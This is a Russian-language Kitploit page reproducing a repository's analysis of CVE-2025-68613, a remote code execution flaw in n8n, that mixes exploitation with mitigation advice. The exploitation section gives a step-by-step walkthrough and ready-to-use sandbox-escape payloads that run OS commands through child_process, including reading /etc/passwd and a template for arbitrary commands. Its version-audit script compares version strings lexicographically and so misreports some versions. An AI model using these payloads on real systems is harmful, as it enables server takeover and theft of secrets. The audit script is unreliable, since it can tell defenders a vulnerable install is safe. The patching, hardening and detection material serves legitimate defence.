Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) Критический анализ RCE + рекомендации по защите (валидация патчей, идеи обнаружения и советы по усилению безопасности) | Kitploit
Инструменты/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРеагирование на Инциденты
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) Критический анализ RCE + рекомендации по защите (валидация патчей, идеи обнаружения и советы по усилению безопасности)

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
17 месяцев назадЕщё не проверено

Баннер заголовка

Печатающий SVG

Severity CVSS Instances Status CWE

Хакер GIF Матрица GIF


Разделитель

📑 Содержание

  • 🎯 Краткое описание
  • 🐛 Уязвимость
  • 🔬 Технический анализ
  • 💀 Пошаговая эксплуатация
  • 💥 Оценка воздействия
  • 🔍 Обнаружение и реагирование
  • 🛡️ Стратегия смягчения
  • 📚 Ссылки

🎯 Краткое описание

Тревога GIF

CVE-2025-68613 — это критическая уязвимость удалённого выполнения кода в платформе автоматизации рабочих процессов n8n, позволяющая аутентифицированным злоумышленникам выполнять произвольные системные команды через инъекцию выражений.


🐛 Уязвимость

Ошибка GIF

📋 Обзор CVE

🤖 Что такое n8n?

n8n — это платформа автоматизации рабочих процессов с открытым исходным кодом, обеспечивающая интеграцию без кода / с низким кодом в более чем 400 приложений. Она широко используется в:

🏢 Сценарии использования

🔧 Техническая первопричина

root@kitploit:~
🔓 ЦЕПОЧКА УЯЗВИМОСТИ:
┌─────────────────────────────────────────────────────────────────┐
│  📝 Язык выражений n8n → Динамическая обработка данных         │
│                           ↓                                     │
│  ⚠️  Недостаточная изоляция песочницы при серверной оценке     │
│                           ↓                                     │
│  💀 Вредоносное выражение выходит из песочницы                 │
│                           ↓                                     │
│  🖥️  Доступ к модулю child_process Node.js                     │
│                           ↓                                     │
│  💥 ПОЛНОЕ УДАЛЁННОЕ ВЫПОЛНЕНИЕ КОДА - выполнение команд ОС    │
└─────────────────────────────────────────────────────────────────┘

🔬 Технический анализ

Анализ GIF

🎯 Поверхность атаки

Предварительные условия для эксплуатации:

#📋 Требование📝 Детали
1️⃣

⚔️ Характеристики атаки

🏷️ Атрибут📊 Значение🔥 Риск
СложностьНИЗКАЯ (AC:L)🔴 Высокий

🗺️ Схема потока уязвимости

root@kitploit:~
graph TD
    A[🔐 Аутентифицированный пользователь] -->|Создаёт| B[📝 Новый рабочий процесс]
    B -->|Внедряет| C[💀 Вредоносное выражение]
    C -->|Запускает| D[⚡ Оценка выражения]
    D -->|Эксплуатирует| E[🔓 Побег из песочницы]
    E -->|Получает доступ| F[🖥️ Среда выполнения Node.js]
    F -->|Выполняет| G[💥 Команда ОС через child_process]
    G -->|Достигает| H[☠️ ПОЛНАЯ КОМПРОМЕТАЦИЯ СЕРВЕРА]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 Пошаговая эксплуатация

Взлом GIF

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Следующее предназначено только для образовательных целей. Несанкционированная эксплуатация незаконна.

📸 Пошаговые скриншоты эксплуатации

🖥️ Шаг 1: Доступ к экземпляру n8n

Первоначальный доступ к уязвимой платформе автоматизации рабочих процессов n8n.

Экран приветствия n8n
🔓 Панель приветствия n8n — точка входа


➕ Шаг 2: Создание нового рабочего процесса

Создание нового рабочего процесса, который будет содержать вредоносную нагрузку.

Создание нового рабочего процесса
📝 Создание нового рабочего процесса с «Добавить первый шаг»


⚡ Шаг 3: Добавление ручного триггера

Настройка триггера рабочего процесса — ручной триггер позволяет выполнять по требованию.

Настройка ручного триггера
🎯 Выбор ручного триггера для активации рабочего процесса


📦 Шаг 4: Добавление узла Set

Добавление узла «Редактировать поля (Set)», который будет содержать вредоносное выражение.

Выбор узла Set
🔧 Добавление узла «Редактировать поля (Set)» для внедрения нагрузки


💉 Шаг 5: Внедрение нагрузки RCE

Критический шаг — внедрение выражения для побега из песочницы и достижения RCE.

Выполнение нагрузки RCE
💀 Вредоносное выражение успешно выполняет команду 'id'!

root@kitploit:~
// 🔴 ВРЕДОНОСНАЯ НАГРУЗКА (НЕ ИСПОЛЬЗОВАТЬ НЕЗАКОННО)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

Вывод показывает: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE ПОДТВЕРЖДЕНА!


💉 Примеры нагрузок

Инъекция кода GIF

⚠️ ПРЕДУПРЕЖДЕНИЕ: Эти нагрузки предназначены только для авторизованного тестирования безопасности. Несанкционированное использование незаконно!

🔹 Команда ID (информация о пользователе)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

🔹 Команда PWD (текущий каталог)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

🔹 Чтение файла (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}

🔹 Шаблон произвольной команды

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('YOUR_COMMAND_HERE').toString() })() }}

📸 PoC эксплуатации чтения файлов

Эксплойт чтения файла passwd
💀 Чтение /etc/passwd — продемонстрирован полный доступ к файловой системе!


📤 Ожидаемый вывод


🔍 Анализ первопричины

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 ПЕРВОПРИЧИНА УЯЗВИМОСТИ                                             │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  Оценщик выражений n8n НЕ ИМЕЕТ санитайзера для предотвращения доступа  │
│  функциональных выражений к:                                            │
│                                                                         │
│    ❌ this.process        → Объект процесса Node.js                     │
│    ❌ mainModule.require  → Система загрузки модулей                    │
│    ❌ child_process       → Выполнение команд ОС                        │
│                                                                         │
│  Это позволяет прямой доступ к системным модулям и выполнению кода!    │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 Краткое описание воздействия

✅ Смягчение

Upgrade

root@kitploit:~
# 🛡️ Обновление n8n до исправленной версии
npm install -g n8n@latest

# Или с Docker
docker pull n8n/n8n:1.122.0

🎬 Цепочка кибератаки

☠️ Возможности после эксплуатации


💥 Оценка воздействия

Взрыв GIF

🔺 Анализ триады КДЦ

🌍 Реальная подверженность

Vulnerable


🔍 Обнаружение и реагирование

Детектив GIF

🔎 Стратегии обнаружения

🛠️ Скрипт аудита версий

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 аудит версий n8n

echo "🔍 Проверка версии n8n..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  УЯЗВИМО: n8n $VER затронута CVE-2025-68613"
        echo "📦 Необходимо: Обновление до 1.120.4, 1.121.1 или 1.122.0+"
        exit 2
    else
        echo "✅ БЕЗОПАСНО: n8n $VER исправлена"
    fi
else
    echo "❌ n8n не найден в PATH"
fi

🚨 Контрольный список реагирования на инциденты

  • 🔌 Изоляция - Отключить затронутый n8n от сети
  • 💾 Сохранение - Зафиксировать журналы и криминалистические артефакты
  • 🔍 Аудит - Проверить все рабочие процессы на вредоносные выражения
  • 🔄 Смена - Изменить все доступные учётные данные
  • 🔀 Анализ - Проверить индикаторы бокового перемещения
  • 📦 Патч - Обновить до безопасной версии перед восстановлением

🛡️ Стратегия смягчения

Щит GIF

⚡ Немедленные действия (Приоритет 0)

🐳 Пример укрепления контейнера

root@kitploit:~
# 🛡️ Укреплённое развертывание n8n
FROM n8n/n8n:1.122.0

# 👤 Запуск от непривилегированного пользователя
USER node

# 🔒 Применить эти флаги выполнения:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 Долгосрочная безопасность

🛡️ Мера📝 Реализация
🌐 Сегментация сетиИзоляция экземпляров n8n
🔥 Правила WAF

💬 Вопрос к Blue Teamers 🔵

Размышление GIF

Как бы вы разработали правило обнаружения для выявления попыток инъекции выражений в определениях рабочих процессов n8n до их выполнения, учитывая необходимость баланса безопасности с легитимным использованием динамических выражений?

Бонус: Какие средства защиты времени выполнения вы бы реализовали, чтобы ограничить радиус взрыва, если побег из песочницы произойдёт, несмотря на установку патча?


📚 Ссылки

Книги GIF

📋 Официальные уведомления

  • 🔗 NVD CVE-2025-68613 Detail
  • 🔗 Snyk Advisory

🔬 Технический анализ

  • 📖 Orca Security: Critical n8n RCE
  • 📖 Resecurity: Expression Injection Deep Dive
  • 📖 SecureLayer7: RCE Exploitation Guide

🎮 Практические ресурсы

  • 🧪 TryHackMe: CVE-2025-68613 Lab
  • 💀 Public PoC Scanner

🏷️ Теги

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #Expression-Injection #Workflow-Automation 
#Sandbox-Escape #CWE-913 #Critical-Vulnerability #Pentesting #Blue-Team

Нижний колонтитул

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот анализ предназначен только для образовательных целей и целей защиты.
Несанкционированная эксплуатация уязвимостей НЕЗАКОННА.

Author Updated

Profile Views

Скачать инструмент

⚡ Краткая статистика

🔥 Показатель📊 Значение
Оценка CVSS9.9 / 10
Подверженные экземпляры103 476+
Сложность атакиНИЗКАЯ
Требуется аутентификацияДа (низкие привилегии)
Взаимодействие пользователяНет

🎯 Ключевые факты

📌 Свойство📝 Значение
Раскрыта18 декабря 2025
ВекторСеть (AV:N)
ОбластьИзменена
ВлияниеКДЦ = ВЫСОКИЙ
Тип эксплойтаИнъекция выражений
СвойствоЗначение
🆔 Идентификатор CVECVE-2025-68613
📊 Оценка CVSS9.9 (Критическая) 🔴
🔗 Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (Некорректный контроль динамически управляемых ресурсов кода)
📦 Затронутые версии0.211.0 → 1.120.3, 1.121.0
✅ Исправленные версии1.120.4, 1.121.1, 1.122.0+
📝 Описание
🔧 DevOpsКонвейеры автоматизации, интеграции CI/CD
🛡️ БезопасностьРабочие процессы SOAR, реагирование на инциденты
💼 БизнесАвтоматизация процессов, рабочие процессы с данными
📊 ДанныеПроцессы ETL, интеграции API
Аутентификация
Действительная учётная запись пользователя n8n (достаточно низких привилегий)
2️⃣РазрешенияВозможность создания / редактирования рабочих процессов
3️⃣Сетевой доступВозможность доступа к экземпляру n8n
Взаимодействие пользователя
Не требуется
🔴 Высокий
ОбластьИзменена🔴 Критический
🎯 Нагрузка📋 Ожидаемый вывод
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdПолный список пользователей системы (root, daemon, node и т.д.)
envВсе переменные окружения, включая секреты
ls -la /Список корневой файловой системы
🎯 Тип воздействия📝 Описание
💻 Выполнение произвольных командВыполнение любой команды ОС
📂 Доступ к файловой системеЧтение/запись любого файла
🔑 Раскрытие переменных окруженияУтечка ключей API, секретов
☠️ Полная компрометация системыПолный захват сервера
🛡️ Серьёзность📊 Рейтинг
Оценка CVSS9.9 / 10
Сложность атакиНИЗКАЯ
Требуемые привилегииНИЗКИЕ
Взаимодействие пользователяНЕТ
Фаза🔥 Действие💀 Воздействие
1️⃣Первоначальный доступАутентификация в n8n
2️⃣ВыполнениеОтправка вредоносного рабочего процесса
3️⃣ПостоянствоРазвёртывание обратного шелла / бэкдора
4️⃣С2Установление командного центра
5️⃣ДействияЭкспорт данных, боковое перемещение
🎯 Действие💥 Уровень воздействия
🔑 Кража учётных данныхИзвлечение ключей API, токенов OAuth, паролей БД
📤 Эксфильтрация данныхДанные рабочих процессов, журналы выполнения, бизнес-информация
🔒 ПостоянствоЗадачи cron, сценарии запуска, веб-шеллы
🔀 Боковое перемещениеПереход к базам данных, CI/CD, облачной инфраструктуре
🗑️ Манипуляция рабочими процессамиИзменение / разрушение логики автоматизации

🔴 Конфиденциальность (ВЫСОКИЙ)

  • 🔑 Раскрытие ключей API
  • 🔐 Утечка токенов OAuth
  • 💾 Доступ к паролям БД
  • 📜 Компрометация журналов выполнения

🟠 Целостность (ВЫСОКИЙ)

  • 📝 Изменение рабочих процессов
  • ⚙️ Повреждение автоматизации
  • 💉 Внедрение вредоносных узлов
  • 📊 Манипуляция данными

🟡 Доступность (ВЫСОКИЙ)

  • ⏹️ Нарушение работы служб
  • 💀 Истощение ресурсов
  • 🔄 Завершение рабочих процессов
  • 🖥️ Простой инфраструктуры
#📋 Метод🔍 Что отслеживать
📜Анализ журналовНеобычные команды от процесса n8n, неудачные выражения
🌐СетьИсходящие соединения с неизвестными IP, большие POST-запросы
⚡Среда выполненияВызовы child_process, неожиданные spawns
📦Аудит версийПроверка на уязвимый диапазон версий
🔢 Приоритет🛠️ Действие📝 Детали
🔴 P0ПАТЧ СЕЙЧАСОбновление до 1.120.4, 1.121.1 или 1.122.0+
🟠 P1Ограничить доступОграничить создание рабочих процессов доверенными пользователями
🟡 P2Укрепление контейнераРазвертывание с ограничениями безопасности
Мониторинг шаблонов выражений
📜 Журналирование аудитаВключение всестороннего логирования
🔍 Проверки безопасностиРегулярная оценка рабочих процессов
🔓 Минимальные привилегииУсиление контроля доступа